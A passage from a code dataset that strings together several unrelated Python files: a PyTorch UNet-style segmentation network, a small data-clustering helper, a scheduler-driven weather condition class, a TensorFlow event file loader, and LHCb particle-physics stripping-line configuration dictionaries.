self_attention:bool=False, **kwargs):\n super().__init__()\n self.shuf = PixelShuffle_ICNR(up_in_c, up_in_c//2, blur=blur, **kwargs)\n self.bn = nn.BatchNorm2d(x_in_c)\n ni = up_in_c//2 + x_in_c\n nf = nf if nf is not None else max(up_in_c//2,32)\n self.conv1 = ConvLayer(ni, nf, norm_type=None, **kwargs)\n self.conv2 = ConvLayer(nf, nf, norm_type=None,\n xtra=SelfAttention(nf) if self_attention else None, **kwargs)\n self.relu = nn.ReLU(inplace=True)\n self.cbam = CBAM(n_channels_in = nf, reduction_ratio = 16, kernel_size = 3)\n\n def forward(self, up_in:Tensor, left_in:Tensor) -> Tensor:\n s = left_in\n up_out = self.shuf(up_in)\n cat_x = self.relu(torch.cat([up_out, self.bn(s)], dim=1))\n x = self.conv1(cat_x)\n x = self.cbam(x)\n return self.conv2(x)\n\nclass _ASPPModule(nn.Module):\n def __init__(self, inplanes, planes, kernel_size, padding, dilation, groups=1):\n super().__init__()\n self.atrous_conv = nn.Conv2d(inplanes, planes, kernel_size=kernel_size,\n stride=1, padding=padding, dilation=dilation, bias=False, groups=groups)\n self.bn = nn.BatchNorm2d(planes)\n self.relu = nn.ReLU()\n\n self._init_weight()\n\n def forward(self, x):\n x = self.atrous_conv(x)\n x = self.bn(x)\n\n return self.relu(x)\n\n def _init_weight(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n torch.nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\nclass ASPP(nn.Module):\n def __init__(self, inplanes=512, mid_c=256, dilations=[6, 12, 18, 24], out_c=None):\n super().__init__()\n self.aspps = [_ASPPModule(inplanes, mid_c, 1, padding=0, dilation=1)] + \\\n [_ASPPModule(inplanes, mid_c, 3, padding=d, dilation=d,groups=4) for d in dilations]\n self.aspps = nn.ModuleList(self.aspps)\n self.global_pool = nn.Sequential(nn.AdaptiveMaxPool2d((1, 1)),\n nn.Conv2d(inplanes, mid_c, 1, stride=1, bias=False),\n nn.BatchNorm2d(mid_c), nn.ReLU())\n out_c = out_c if out_c is not None else mid_c\n self.out_conv = 
nn.Sequential(nn.Conv2d(mid_c*(2+len(dilations)), out_c, 1, bias=False),\n nn.BatchNorm2d(out_c), nn.ReLU(inplace=True))\n self.conv1 = nn.Conv2d(mid_c*(2+len(dilations)), out_c, 1, bias=False)\n self._init_weight()\n\n def forward(self, x):\n x0 = self.global_pool(x)\n xs = [aspp(x) for aspp in self.aspps]\n x0 = F.interpolate(x0, size=xs[0].size()[2:], mode='bilinear', align_corners=True)\n x = torch.cat([x0] + xs, dim=1)\n return self.out_conv(x)\n\n def _init_weight(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n torch.nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n\nfrom torchvision.models.resnet import ResNet, Bottleneck\nclass UneXt101(nn.Module):\n# class UneXt50(nn.Module):\n def __init__(self, stride=1, **kwargs):\n super().__init__()\n #encoder\n # m = ResNet(Bottleneck, [3, 4, 23, 3], groups=32, width_per_group=4)\n # m = torch.hub.load('facebookresearch/semi-supervised-ImageNet1K-models',\n # 'resnext50_32x4d_swsl')\n m = ResNet(Bottleneck, [3, 4, 23, 3], groups=32, width_per_group=8)\n m = torch.hub.load('facebookresearch/semi-supervised-ImageNet1K-models',\n 'resnext101_32x8d_ssl')\n self.enc0 = nn.Sequential(m.conv1, m.bn1, nn.ReLU(inplace=True))\n self.enc1 = nn.Sequential(nn.MaxPool2d(kernel_size=3, stride=2, padding=1, dilation=1),\n m.layer1) #256\n self.enc2 = m.layer2 #512\n self.enc3 = m.layer3 #1024\n self.enc4 = m.layer4 #2048\n #aspp with customized dilatations\n self.aspp = ASPP(2048,256,out_c=512,dilations=[stride*1,stride*2,stride*3,stride*4])\n self.drop_aspp = nn.Dropout2d(0.5)\n #decoder\n self.dec4 = UnetBlock(512,1024,256)\n self.dec3 = UnetBlock(256,512,128)\n self.dec2 = UnetBlock(128,256,64)\n self.dec1 = UnetBlock(64,64,32)\n self.fpn = FPN([512,256,128,64],[16]*4)\n self.drop = nn.Dropout2d(0.1)\n self.final_conv = ConvLayer(32+16*4, 1, ks=1, norm_type=None, act_cls=None)\n\n def forward(self, x):\n enc0 = self.enc0(x)\n enc1 = 
self.enc1(enc0)\n enc2 = self.enc2(enc1)\n enc3 = self.enc3(enc2)\n enc4 = self.enc4(enc3)\n enc5 = self.aspp(enc4)\n dec3 = self.dec4(self.drop_aspp(enc5),enc3)\n dec2 = self.dec3(dec3,enc2)\n dec1 = self.dec2(dec2,enc1)\n dec0 = self.dec1(dec1,enc0)\n x = self.fpn([enc5, dec3, dec2, dec1], dec0)\n x = self.final_conv(self.drop(x))\n x = F.interpolate(x, scale_factor=2, mode='bilinear', align_corners=False)\n return x\n\nclass UneXt50(nn.Module):\n def __init__(self, stride=1, **kwargs):\n super().__init__()\n #encoder\n m = ResNet(Bottleneck, [3, 4, 23, 3], groups=32, width_per_group=4)\n m = torch.hub.load('facebookresearch/semi-supervised-ImageNet1K-models',\n 'resnext50_32x4d_swsl')\n self.enc0 = nn.Sequential(m.conv1, m.bn1, nn.ReLU(inplace=True))\n self.enc1 = nn.Sequential(nn.MaxPool2d(kernel_size=3, stride=2, padding=1, dilation=1),\n m.layer1) #256\n self.enc2 = m.layer2 #512\n self.enc3 = m.layer3 #1024\n self.enc4 = m.layer4 #2048\n #aspp with customized dilatations\n self.aspp = ASPP(2048,256,out_c=512,dilations=[stride*1,stride*2,stride*3,stride*4])\n self.drop_aspp = nn.Dropout2d(0.5)\n #decoder\n self.dec4 = UnetBlock(512,1024,256)\n self.dec3 = UnetBlock(256,512,128)\n self.dec2 = UnetBlock(128,256,64)\n self.dec1 = UnetBlock(64,64,32)\n self.fpn = FPN([512,256,128,64],[16]*4)\n self.drop = nn.Dropout2d(0.1)\n self.final_conv = ConvLayer(32+16*4, 1, ks=1, norm_type=None, act_cls=None)\n\n def forward(self, x):\n enc0 = self.enc0(x)\n enc1 = self.enc1(enc0)\n enc2 = self.enc2(enc1)\n enc3 = self.enc3(enc2)\n enc4 = self.enc4(enc3)\n enc5 = self.aspp(enc4)\n dec3 = self.dec4(self.drop_aspp(enc5),enc3)\n dec2 = self.dec3(dec3,enc2)\n dec1 = self.dec2(dec2,enc1)\n dec0 = self.dec1(dec1,enc0)\n x = self.fpn([enc5, dec3, dec2, dec1], dec0)\n x = self.final_conv(self.drop(x))\n x = F.interpolate(x, scale_factor=2, mode='bilinear', align_corners=False)\n return x\n\n# model = UneXt101().cuda()\n# 
print(model)","sub_path":"MARS数据科学平台/2021“SEED”第二届江苏大数据开发与应用大赛(华录杯)——医疗卫生赛道/code/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":10783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"641103568","text":"\n\n\n\ndef get_evisession(datas,t_lo,gap):\n t_result = {}\n for data in datas:\n t_key = data.data[t_lo:t_lo+gap]\n if t_key not in t_result:\n t_result[t_key] = []\n t_result[t_key].append(data)\n else:\n t_result[t_key].append(data)\n return t_result\n\ndef clusession_byt(datas,t_time):\n length = len(datas)\n i = 0\n t_result = []\n while(i < length - 1):\n t_r = []\n t_r.append(datas[i])\n j = 1\n while(j + i < length):\n t_lo = i + j\n if(datas[t_lo].date - t_r[-1].date > t_time):\n break;\n else:\n t_r.append(datas[t_lo])\n j = j + 1\n t_result.append(t_r)\n i = i + j\n return t_result\n\ndef test_rate(result,t_lo,gap):\n t_zhichi = 0\n for t_r in result:\n t_len = len(t_r)\n if(t_len > 0):\n t_s = t_r[0].data[t_lo:t_lo+gap]\n else:\n continue\n j = 1\n t_lo = 0\n while(j < t_len):\n if(t_r[j].data[t_lo:t_lo+gap] != t_s):\n t_lo = 1\n break\n j = j + 1\n if t_lo == 0:\n t_zhichi = t_zhichi + 1\n return float(t_zhichi)/float(len(result))\n\n\n\n\n\n\n\n\n","sub_path":"Reverse_Tool/deal_data/try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"582159096","text":"\"\"\"\nweather_conditions\n\"\"\"\n\nimport logging\nfrom apscheduler.triggers.cron import CronTrigger\nfrom pubsub import pub\nfrom condition import Condition\n\nLOGGER = logging.getLogger(__name__)\n\nCONDITION_CLASS_NAME = 'WeatherConditions'\n\nclass WeatherConditions(Condition):\n \"\"\"\n WeatherConditions\n\n Conditions for reading weather data\n \"\"\"\n\n def __init__(self, scheduler, schedule='0 * * * *'):\n \"\"\"\n Constructor\n \"\"\"\n\n Condition.__init__(self, scheduler, schedule)\n 
scheduler.add_job(self.evaluate, CronTrigger.from_crontab(schedule))\n LOGGER.debug('Initialized')\n\n def evaluate(self, msg=None):\n \"\"\"\n Handler for receiving messages\n \"\"\"\n\n LOGGER.info('Evaluating')\n pub.sendMessage('weather.update', msg=None)\n","sub_path":"conditions/weather_conditions.py","file_name":"weather_conditions.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"537856042","text":"# Copyright 2015 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"Functionality for loading events from a record file.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\n\nclass EventFileLoader(object):\n \"\"\"An EventLoader is an iterator that yields Event protos.\"\"\"\n\n def __init__(self, file_path):\n if file_path is None:\n raise ValueError('A file path is required')\n file_path = tf.resource_loader.readahead_file_path(file_path)\n tf.logging.debug('Opening a record reader pointing at %s', file_path)\n with tf.errors.raise_exception_on_not_ok_status() as status:\n self._reader = tf.pywrap_tensorflow.PyRecordReader_New(\n tf.compat.as_bytes(file_path), 0, tf.compat.as_bytes(''), status)\n # Store it for logging purposes.\n 
self._file_path = file_path\n if not self._reader:\n raise IOError('Failed to open a record reader pointing to %s' % file_path)\n\n def Load(self):\n \"\"\"Loads all new values from disk.\n\n Calling Load multiple times in a row will not 'drop' events as long as the\n return value is not iterated over.\n\n Yields:\n All values that were written to disk that have not been yielded yet.\n \"\"\"\n tf.logging.debug('Loading events from %s', self._file_path)\n while True:\n try:\n with tf.errors.raise_exception_on_not_ok_status() as status:\n self._reader.GetNext(status)\n except (tf.errors.DataLossError, tf.errors.OutOfRangeError):\n # We ignore partial read exceptions, because a record may be truncated.\n # PyRecordReader holds the offset prior to the failed read, so retrying\n # will succeed.\n break\n event = tf.Event()\n event.ParseFromString(self._reader.record())\n yield event\n tf.logging.debug('No more events in %s', self._file_path)\n\n\ndef main(argv):\n if len(argv) != 2:\n print('Usage: event_file_loader ')\n return 1\n loader = EventFileLoader(argv[1])\n for event in loader.Load():\n print(event)\n return 0\n\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"Tensorflow_Pandas_Numpy/source3.6/tensorboard/backend/event_processing/event_file_loader.py","file_name":"event_file_loader.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"414421586","text":"\"\"\"\nLine config dictionaries for the RD WG\n\n\nDictionary names should have the same name as the corresponding\nStrippingSelections file containing the line builder instance.\n\n e.g StrippingPromptCharm linebuilder should be added as:\n\n PromptCharm = { ... }\n\"\"\"\n\nfrom GaudiKernel.SystemOfUnits import * \n\n# Bd2KstarMuMu for MVA\n# J. Dickens, M. 
Patel \n\nBd2KstarMuMu = {\n 'BUILDERTYPE' : 'StrippingBdToKstarMuMuConf',\n 'CONFIG' : { \n 'UseNoPIDsHadrons' : True,\n 'Prescale_BdToKstarMuMu' : 1.0,\n 'Postscale_BdToKstarMuMu' : 1.0,\n 'Prescale_BdToKstarMuMuSS' : 1.0,\n 'Postscale_BdToKstarMuMuSS' : 1.0,\n 'Prescale_BuToKMuMu' : 1.0,\n 'Postscale_BuToKMuMu' : 1.0,\n 'Prescale_BuToKMuMuSS' : 1.0,\n 'Postscale_BuToKMuMuSS' : 1.0,\n 'B_Comb_MassLow' : 4600.0,\n 'B_Comb_MassHigh' : 6000.0,\n 'B_MassLow' : 4850.0,\n 'B_MassHigh' : 5780.0,\n 'B_VertexCHI2' : 6.0,\n 'B_IPCHI2' : 16.0,\n 'B_DIRA' : 0.9999,\n 'B_FlightCHI2' : 121.0,\n 'B_Dau_MaxIPCHI2' : 9.0, \n 'Dau_VertexCHI2' : 12.0,\n 'Dau_DIRA' : -0.9,\n 'Kstar_Comb_MassLow' : 550.0,\n 'Kstar_Comb_MassHigh' : 2200.0,\n 'Kstar_MassLow' : 600.0,\n 'Kstar_MassHigh' : 2000.0,\n 'Kstar_MinIPCHI2' : 0.0,\n 'Kstar_FlightChi2' : 9.0, \n 'Kstar_Dau_MaxIPCHI2' : 9.0, \n 'Dimu_FlightChi2' : 9.0, \n 'Dimu_Dau_MaxIPCHI2' : 9.0, \n 'Track_CHI2nDOF' : 5.0,\n 'Hadron_MinIPCHI2' : 9.0, \n 'Muon_MinIPCHI2' : 9.0,\n 'Muon_IsMuon' : False,\n 'MuonNoPIDs_PIDmu' : 0.0\n },\n 'WGs' : [ 'RD' ] ,\n 'STREAMS' : [ 'Dimuon' ]\n }\n\n\n\n# B2XMuMu for RD\n# P. Schaak, M. Patel, P. 
Owen & T.Blake\n\nB2XMuMu = {\n 'BUILDERTYPE' : 'B2XMuMuConf',\n 'CONFIG' : {\n 'BVXCHI2NDOF' : 8 # dimensionless\n , 'BIPCHI2' : 9.0 # dimensionless\n , 'BDIRA' : 0.999968 # dimensionless\n , 'BFDCHI2' : 100.0 # dimensionless\n , 'KpiMINIPCHI2' : 9.0 # dimensionless\n , 'KpiTRACKCHI2' : 4.0 # dimensionless \n , 'KpiVXCHI2NDOF' : 9.0 # dimensionless\n , 'MuonMINIPCHI2' : 16.0 # dimensionless\n , 'MuonTRACKCHI2' : 4.0 # dimensionless\n , 'MuonPID' : 0.0 # dimensionless\n , 'DimuonVXCHI2NDOF' : 9.0 # dimensionless\n , 'DimuonUPPERMASS' : 5050.0 # MeV\n , 'Pi0MINPT' : 800.0 # MeV\n , 'DplusLOWERMASS' : 1600.0 # MeV\n , 'DplusUPPERMASS' : 2300.0 # MeV \n , 'KstarplusWINDOW' : 300.0 # MeV \n , 'KsWINDOW' : 30.0 # MeV \n , 'LambdaWINDOW' : 30.0 # MeV \n , 'LongLivedPT' : 500.0 # MeV \n , 'LongLivedTau' : 2 # ps \n },\n 'WGs' : [ 'RD' ],\n 'STREAMS' : [ 'Dimuon' ]\n }\n\n# Bs2MuMuPhi\n# P. Schaak\n\nBs2MuMuPhi = {\n 'BUILDERTYPE' : 'Bs2MuMuPhiConf' ,\n 'CONFIG' : {\n 'BsIPCHI2' : 9.0 # dimensionless\n , 'BsLT' : 0.0002 # ns\n , 'BsVertexCHI2' : 40.0 # dimensionless\n , 'KaonPIDK' : 0 # dimensionless\n , 'KaonMINIPCHI2' : 9.0 # dimensionless\n , 'MuonMINIPCHI2' : 9.0 # dimensionless\n },\n 'WGs' : [ 'RD' ] ,\n 'STREAMS' : [ 'Dimuon' ]\n }\n\n\n# Same-sign searches\n# S. Redford & Wenbin \n\nB2XMuMuSS = {\n 'BUILDERTYPE' : 'B2XMuMuSSConf',\n 'CONFIG' : {\n 'MuonP' : 3000. , #MeV\n 'MuonPT' : 500. , #MeV\n 'MuonMINIPCHI2' : 5 , #adminensional\n 'PionP' : 2000. , #MeV\n 'PionPT' : 500. , #MeV\n 'PionMINIPCHI2' : 5 , #adminensional\n 'KaonP' : 2000. , #MeV\n 'KaonPT' : 500. , #MeV\n 'KaonMINIPCHI2' : 5 , #adminensional\n 'DimuonMass' : 0. , #MeV\n 'BVCHI2DOF' : 7 , #adminensional \n 'BDIRA' : 0.9998 , #adimensional\n 'BIPCHI2' : 30 , #adimensional\n 'BMassWin' : 400. 
, #MeV, mass window\n 'B2PiMuMuOSLinePrescale' : 1 ,\n 'B2PiMuMuOSLinePostscale' : 1 ,\n 'B2PiMuMuSSLinePrescale' : 1 ,\n 'B2PiMuMuSSLinePostscale' : 1 ,\n 'B2KMuMuOSLinePrescale' : 1 ,\n 'B2KMuMuOSLinePostscale' : 1 ,\n 'B2KMuMuSSLinePrescale' : 1 ,\n 'B2KMuMuSSLinePostscale' : 1\n },\n 'WGs' : [ 'RD' ] ,\n 'STREAMS' : [ 'Dimuon' ]\n }\n\n\n# HyperCP lines\n# Vanya + Andrei\n\nHyperCP = {\n 'BUILDERTYPE' : 'StrippingHyperCPXConf',\n 'CONFIG' : {\n 'ProtonCuts' : ' ( TRCHI2DOF < 5 ) & ( 0 < PIDp - PIDpi ) & ( BPVIPCHI2() > 12 ) ' , \n 'MuonCuts' : ' ( TRCHI2DOF < 5 ) & ISMUON & ( BPVIPCHI2() > 12 ) ' , \n 'PionCuts' : ' ( TRCHI2DOF < 5 ) & ( BPVIPCHI2() > 12 ) ' ,\n 'MuonCuts_forTau23Mu' : ' ( PT > 300 * MeV ) & ( TRCHI2DOF < 5 ) & ISMUON & ( BPVIPCHI2() > 9 ) ' , \n 'PionCuts_forTau23Mu' : ' ( PT > 300 * MeV ) & ( TRCHI2DOF < 5 ) & ( BPVIPCHI2() > 9 ) ' ,\n #\n 'SigmaCTau' : 5 * mm ,\n 'SigmaMass' : 250 * MeV ,\n #\n 'DsCTau' : 200 * micrometer ,\n 'Ds23PiMass' : 80 * MeV ,\n 'Ds2PhiPiMass' : 250 * MeV,\n #\n 'DplusCTau' : 200 * micrometer ,\n 'DplusMass' : 250 * MeV ,\n #\n # ``Global Event Cuts''\n #\n 'PrimaryVertices' : True ,\n #\n # Technicalities:\n #\n 'Preambulo' : [\n # shortcut for chi2 of vertex fit \n 'chi2vx = VFASPF(VCHI2) ' , \n # shortcut for the c*tau\n \"from GaudiKernel.PhysicalConstants import c_light\" , \n ## use the embedded cut for chi2(LifetimeFit)<9\n \"ctau = BPVLTIME ( 9 ) * c_light \" ,\n \"ctau_forDs = BPVLTIME ( 225 ) * c_light \" ,\n ## phi(1020) mass-window \n \"phi = in_range ( 920 * MeV , AM23 , 1120 * MeV )\"\n ] , \n #\n # Prescales\n #\n 'SigmaPrescale' : 1.0 ,\n 'DplusPrescale' : 1.0 ,\n 'DsPrescale' : 1.0 ,\n 'Ds3PiPrescale' : 0.2\n },\n 'WGs' : [ 'RD' ],\n 'STREAMS' : [ 'Dimuon' ]\n }\n\n# Same-sign searches\n# Wenbin \n\nB2SameChargeMuon = {\n 'BUILDERTYPE' : 'StrippingB2SameChargeMuonConf',\n 'CONFIG' : { \n 'LinePrescale' : 1. 
,\n 'LinePostscale' : 1.\n },\n 'WGs' : [ 'RD' ],\n 'STREAMS' : [ 'Dimuon' ]\n }\n\n\n# Bu2LLK ( B+ -> ee K and mu mu K )\n# P. Koppenburg\n\nBu2LLK = {\n 'BUILDERTYPE' : 'Bu2LLKConf',\n 'CONFIG' : {\n 'BFlightCHI2' : 100 # adimentional \n , 'BDIRA' : 0.9995 # adimentional TIGHTENED\n , 'BIPCHI2' : 25 # adimentional \n , 'BVertexCHI2' : 16 # adimentional\n , 'DiLeptonPT' : 0 # MeV (not used)\n , 'DiLeptonFDCHI2' : 16 # adimentional\n , 'DiLeptonIPCHI2' : 9 # adimentional\n , 'LeptonIPCHI2' : 16 # adimentional TIGHTENED\n , 'LeptonPT' : 800 # MeV \n , 'KaonIPCHI2' : 16 # adimentional TIGHTENED\n , 'KaonPT' : 800 # MeV LOOSENED\n , 'UpperMass' : 5500 # MeV (Higher bound of signal box)\n , 'Bu2eeKLinePrescale' : 1\n , 'Bu2eeKLinePostscale' : 1\n , 'Bu2mmKLinePrescale' : 1\n , 'Bu2mmKLinePostscale' : 1\n },\n 'WGs' : [ 'RD' ] ,\n 'STREAMS' : ['Dimuon']\n #{ 'Dimuon' : [ 'StrippingBu2LLK_mmLine' ] , 'Dielectron' : [ 'StrippingBu2LLK_eeLine' ] } \n }\n\n# B2MuMuMuMuLines\n# J. Albrecht\n\nB2MuMuMuMuLines = {\n 'BUILDERTYPE' : 'B2MuMuMuMuLinesConf',\n 'CONFIG' : {\n 'B2MuMuMuMuLinePrescale' : 1,\n 'B2MuMuMuMuLinePostscale' : 1,\n },\n 'WGs' : [ 'RD' ],\n 'STREAMS' : [ 'Dimuon' ]\n }\n\n\n# Stripping TriMuons\n# Vanya \n\nTriMuon = {\n 'BUILDERTYPE' : 'StrippingTriMuonsConf',\n 'CONFIG' : {\n 'GoodMuons' : \" ( PT > 300 * MeV ) & ( TRCHI2DOF < 5 ) & ( BPVIPCHI2 () > 6 ) \" ,\n 'GoodMuonsForBc' : \" ( BPVIPCHI2 () > 9 ) \" ,\n 'TightMuons' : \" ( PT > 1.9 * GeV ) & ( BPVIPCHI2 () > 25 ) \" ,\n #\n # Trigger \n #\n 'HLT' : None , \n #\n # Prescale \n #\n '3mu-Prescale' : 1.00 , \n 'Bc-Prescale' : 1.00 , \n 'Tau-Prescale' : 1.00 , \n #\n # Technicalities:\n #\n 'Preambulo' : [\n ## shortcut for chi2 of vertex fit \n 'chi2vx = VFASPF(VCHI2) ' ,\n ## shortcut for the c*tau\n \"from GaudiKernel.PhysicalConstants import c_light\" ,\n \"ctau = BPVLTIME ( ) * c_light \" ,\n \"ctauBc = PDGM('B_c+') / M * BPVLTIME ( ) * c_light \" \n ]\n },\n 'WGs' : [ 'RD' ] ,\n 'STREAMS' : [ 
'Dimuon' ] \n }\n\n\n\n# Lines for phi mu mu / f0 mu mu\n# Liming Zhang\n\nBs2PhiMuMu = { \n 'BUILDERTYPE' : 'Bs2PhiMuMuLinesConf',\n 'WGs' : ['RD'],\n 'STREAMS' : ['Dimuon'],\n 'CONFIG' : {\n \"MINIPCHI2\" : 4.00 # adimensiional\n ,\"TRCHI2\" : 10.0 # adimensiional\n ,\"KaonPIDK\" : 1e-10 # adimensiional\n ,\"PhiPT\" : 100 # MeV\n ,\"MuonMINIPCHI2\" : 2.25 # adimensiional\n ,\"MuonPIDmu\" : -5.0 # adimensiional\n ,\"MuonTRCHI2\" : 10.0 # adimensiional\n ,\"BsMassWin\" : 250.0 # MeV\n ,\"BsVCHI2DOF\" : 8.0 # adimensiional\n ,\"BsDIRA\" : 0.9993 # adimensiional\n ,\"BsFDCHI2\" : 25.0 # adimensiional\n ,\"PionPIDK\" : 10.0 # adimensiional\n ,\"f0MassWin\" : 200.0 # MeV\n ,\"VCHI2\" : 10.0 # adimensiional\n ,\"BsIPCHI2\" : 36.0 # adimensiional\n ,\"DocaChi2Max\" : 20 #mm\n }\n }\n\n# Radiative lines\n# F. Soomro, A. Puig \n\nB2XGamma = {\n 'BUILDERTYPE' : 'StrippingB2XGammaConf',\n 'CONFIG' : {\n 'TrIPchi2Phi' : 15. # Dimensionless\n ,'TrIPchi2Kst' : 15. # Dimensionless\n ,'PhiMassWin' : 15. # MeV\n ,'KstMassWin' : 100. # MeV\n ,'KstMassWinSB' : 150. # MeV\n ,'BsMassWin' : 1000. # MeV\n ,'B0MassWin' : 1000. # MeV\n ,'BMassWinSB' : 2000. # MeV\n ,'BsDirAngle' : 0.02 # radians\n ,'B0DirAngle' : 0.02 # radians\n ,'BDirAngleMoni' : 0.06 # radians\n ,'BsPVIPchi2' : 15. # Dimensionless\n ,'B0PVIPchi2' : 15. # Dimensionless\n ,'photonPT' : 2600. # MeV\n ,'PhiVCHI2' : 15. # dimensionless\n ,'KstVCHI2' : 15. # dimensionless\n ,'TrChi2' : 5. 
# dimensionless\n # Pre- and postscales\n ,'Bs2PhiGammaWideBMassPreScale' : 0.1\n ,'Bs2PhiGammaWideBMassPostScale' : 1.0\n ,'Bs2PhiGammaLooseDiraPreScale' : 0.1\n ,'Bs2PhiGammaLooseDiraPostScale' : 1.0\n ,'Bs2PhiGammaPreScale' : 1.0\n ,'Bs2PhiGammaPostScale' : 1.0\n ,'Bd2KstGammaWideBMassPreScale' : 0.05\n ,'Bd2KstGammaWideBMassPostScale' : 1.0\n ,'Bd2KstGammaLooseDiraPreScale' : 0.05\n ,'Bd2KstGammaLooseDiraPostScale' : 1.0\n ,'Bd2KstGammaWideKstMassPreScale' : 0.05\n ,'Bd2KstGammaWideKstMassPostScale' : 1.0\n ,'Bd2KstGammaWidePreScale' : 0.05\n ,'Bd2KstGammaWidePostScale' : 1.0\n ,'Bd2KstGammaPreScale' : 1.0\n ,'Bd2KstGammaPostScale' : 1.0\n },\n 'WGs' : ['RD'],\n 'STREAMS' : [ 'Radiative' ] \n }\n\n# Bd2eeKstar\n# J. He\n\nBd2eeKstar = {\n 'BUILDERTYPE' : 'Bd2eeKstarConf',\n 'CONFIG' : {\n 'LinePrescale' : 1. ,\n 'LinePostscale' : 1. ,\n #\n 'ElectronPT' : 350. , # MeV\n 'ElectronTrackCHI2pNDOF' : 100. ,\n 'ElectronIPCHI2' : 2.25 ,\n 'ElectronPIDepi' : -2. , \n #\n 'eeCombMinMass' : 0. , # MeV \n 'eeCombMaxMass' : 1550. , # MeV \n 'eeVertexCHI2' : 15. , \n 'eeMinMass' : 20. , # MeV \n 'eeMaxMass' : 1500. , # MeV\n 'eeFD' : 1. , # mm\n #\n 'KaonPT' : 400. , # MeV \n 'KaonP' : 3000. , # MeV \n 'KaonTrackCHI2pNDOF' : 5. , \n 'KaonIPCHI2' : 4. , \n 'KaonPIDKpi' : -5. , \n #\n 'PionPT' : 300. , # MeV\n 'PionP' : 3000. , # MeV \n 'PionTrackCHI2pNDOF' : 5. , \n 'PionIPCHI2' : 4. , \n 'PionPIDpiK' : 10. , # PIDpi-PIDK > -5, i.e., PIDK<5 \n #\n 'KstarComMassW' : 200. , # MeV \n 'KstarVertexCHI2' : 25. , \n 'KstarMassW' : 130. , # MeV\n 'KstarIPCHI2' : 1. , \n 'KstarFDCHI2' : 1. , \n #\n 'BComMassW' : 1200. , # MeV\n 'BVertexCHI2' : 9. , # /ndf\n 'BMassW' : 1000. , # MeV \n 'BIPCHI2' : 64. , # pointing\n 'BFDCHI2' : 9. , \n 'BDIRA' : 0.999, \n 'BIP' : 0.05 , # mm\n 'SumIPSCut' : \" & (SUMTREE(((ABSID=='K+') | (ABSID=='pi-') | (ID=='e+') | (ID=='e-')),sqrt(BPVIPCHI2()))>15)\" \n },\n 'WGs' : [ 'RD' ],\n 'STREAMS' : [ 'Radiative' ]\n }\n\n\n# B2JpsiKstar, Jpsi -> ee \n# J. 
He\n\nBd2JpsieeKstar = {\n 'BUILDERTYPE' : 'Bd2JpsieeKstarConf',\n 'CONFIG' : {\n 'LinePrescale' : 1. ,\n 'LinePostscale' : 1. ,\n #\n 'ElectronPT' : 350. , # MeV\n 'ElectronTrackCHI2pNDOF' : 100. ,\n 'ElectronIPCHI2' : 2.25 ,\n 'ElectronPIDepi' : -2. , \n #\n 'eeCombMinMass' : 2100. , # MeV \n 'eeCombMaxMass' : 4300. , # MeV \n 'eeVertexCHI2' : 15. , \n 'eeMinMass' : 2200. , # MeV \n 'eeMaxMass' : 4200. , # MeV\n 'eeFD' : 1. , # mm\n #\n 'KaonPT' : 400. , # MeV \n 'KaonP' : 3000. , # MeV \n 'KaonTrackCHI2pNDOF' : 5. , \n 'KaonIPCHI2' : 4. , \n 'KaonPIDKpi' : -5. , \n #\n 'PionPT' : 300. , # MeV\n 'PionP' : 3000. , # MeV \n 'PionTrackCHI2pNDOF' : 5. , \n 'PionIPCHI2' : 4. , \n 'PionPIDpiK' : 10. , # PIDpi-PIDK > -5, i.e., PIDK<5 \n #\n 'KstarComMassW' : 200. , # MeV \n 'KstarVertexCHI2' : 25. , \n 'KstarMassW' : 130. , # MeV\n 'KstarIPCHI2' : 1. , \n 'KstarFDCHI2' : 1. , \n #\n 'BComMassW' : 1200. , # MeV\n 'BVertexCHI2' : 9. , # /ndf\n 'BMassW' : 1000. , # MeV \n 'BIPCHI2' : 64. , # pointing\n 'BFDCHI2' : 9. , \n 'BDIRA' : 0.999, \n 'BIP' : 0.05 , # mm\n 'SumIPSCut' : \" & (SUMTREE(((ABSID=='K+') | (ABSID=='pi-') | (ID=='e+') | (ID=='e-')),sqrt(BPVIPCHI2()))>15)\" \n },\n 'WGs' : [ 'RD' ],\n 'STREAMS' : [ 'Radiative' ] \n }\n\n\n# J. 
